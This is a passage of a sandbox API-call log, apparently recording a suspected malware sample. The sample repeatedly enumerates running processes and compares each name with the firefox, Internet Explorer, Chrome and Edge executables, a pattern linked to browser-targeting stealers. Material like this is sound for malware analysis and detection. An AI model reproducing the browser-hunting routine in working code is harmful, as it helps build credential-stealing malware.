cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0192.050] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0192.050] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0192.050] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0192.050] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.050] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0192.051] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0192.051] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0192.051] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0192.051] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.051] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0192.051] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0192.051] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0192.051] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0192.051] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.051] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0192.052] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0192.052] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0192.052] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0192.052] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.052] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0192.052] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0192.053] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0192.053] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0192.053] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.053] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0192.053] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0192.053] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0192.053] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0192.053] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.053] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0192.054] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0192.054] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0192.054] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0192.054] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.054] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0192.054] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0192.054] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0192.054] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0192.054] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.054] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0192.055] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0192.055] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0192.055] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0192.055] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.055] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0192.055] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0192.055] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0192.055] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0192.055] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.055] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0192.056] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0192.056] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0192.056] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0192.056] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.056] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0192.057] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0192.057] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0192.057] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0192.057] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.057] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0192.057] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0192.057] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0192.057] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0192.057] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.057] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0192.058] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0192.058] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0192.058] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0192.058] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.058] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.058] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0192.058] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0192.058] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0192.058] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.058] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.059] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0192.059] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0192.059] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0192.059] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.059] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0192.059] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0192.059] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0192.059] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0192.060] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.060] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.060] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0192.060] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0192.060] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0192.060] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.060] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0192.061] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0192.061] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0192.061] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0192.061] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.061] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.061] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0192.061] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0192.061] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0192.061] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.061] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.062] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0192.062] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0192.062] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0192.062] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.062] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0192.062] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0192.062] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0192.062] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0192.062] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.063] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.063] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0192.063] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0192.063] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0192.063] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.063] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.064] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0192.064] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0192.064] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0192.064] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.064] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.064] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0192.064] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0192.064] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0192.064] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.064] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.065] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0192.065] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0192.065] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0192.065] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.065] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.065] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0192.065] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0192.065] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0192.065] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.065] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0192.066] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0192.066] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0192.066] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0192.066] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0192.066] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0192.067] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0192.067] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0192.067] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0192.067] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.067] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0192.067] CloseHandle (hObject=0xd4) returned 1 [0192.067] Sleep (dwMilliseconds=0x3e8) [0193.170] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0193.174] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.175] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0193.175] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0193.175] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0193.175] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0193.175] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0193.175] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0193.175] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0193.175] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0193.175] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0193.175] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0193.176] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0193.176] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0193.176] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0193.176] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.176] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0193.176] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0193.176] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0193.176] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0193.176] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.176] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0193.177] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0193.177] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0193.177] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0193.177] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.177] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0193.177] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0193.177] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0193.178] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0193.178] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.178] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0193.178] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0193.178] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0193.178] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0193.178] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.178] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0193.179] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0193.179] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0193.179] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0193.179] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.179] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0193.179] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0193.179] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0193.179] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0193.179] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.179] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0193.180] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0193.180] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0193.180] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0193.180] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.180] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.180] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.180] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.180] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.180] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.180] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, 